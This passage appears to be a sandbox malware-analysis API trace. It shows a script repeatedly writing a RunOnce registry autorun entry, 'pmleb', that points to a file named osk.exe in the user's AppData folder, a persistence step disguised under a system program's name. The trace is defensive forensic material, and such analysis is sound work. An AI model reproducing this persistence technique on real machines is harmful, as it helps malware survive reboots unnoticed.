[0092.399] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.399] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.400] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.400] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.400] RegCloseKey (hKey=0x280) returned 0x0 [0092.400] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.400] SetTimer (hWnd=0x20280, nIDEvent=0x21fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fa [0092.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.404] KillTimer (hWnd=0x20280, uIDEvent=0x21fa) returned 1 [0092.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.405] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.405] IUnknown:Release (This=0x787518) returned 0x1 [0092.405] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.405] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.405] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.405] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.405] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.405] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.406] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0092.406] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.406] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x80 [0092.406] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.407] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0092.407] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.407] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.407] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.407] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.407] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.408] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.408] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.408] RegCloseKey (hKey=0x280) returned 0x0 [0092.408] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.408] SetTimer (hWnd=0x20280, nIDEvent=0x21fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fb [0092.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.420] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.420] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.420] KillTimer (hWnd=0x20280, uIDEvent=0x21fb) returned 1 [0092.421] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.421] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.421] IUnknown:Release (This=0x787518) returned 0x1 [0092.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.421] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.421] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.422] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.422] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0092.422] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.422] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x81 [0092.422] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.423] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0092.423] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.423] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.423] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.423] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.424] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.424] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.424] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.424] RegCloseKey (hKey=0x280) returned 0x0 [0092.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.424] SetTimer (hWnd=0x20280, nIDEvent=0x21fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fc [0092.424] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.436] KillTimer (hWnd=0x20280, uIDEvent=0x21fc) returned 1 [0092.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.436] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.436] IUnknown:Release (This=0x787518) returned 0x1 [0092.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.436] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.437] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0092.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.437] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x82 [0092.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.438] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0092.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0092.448] IUnknown:Release (This=0x787518) returned 0x1 [0092.448] GetTickCount () returned 0x114bb35 [0092.448] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.448] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.448] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.448] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.448] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.448] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) 
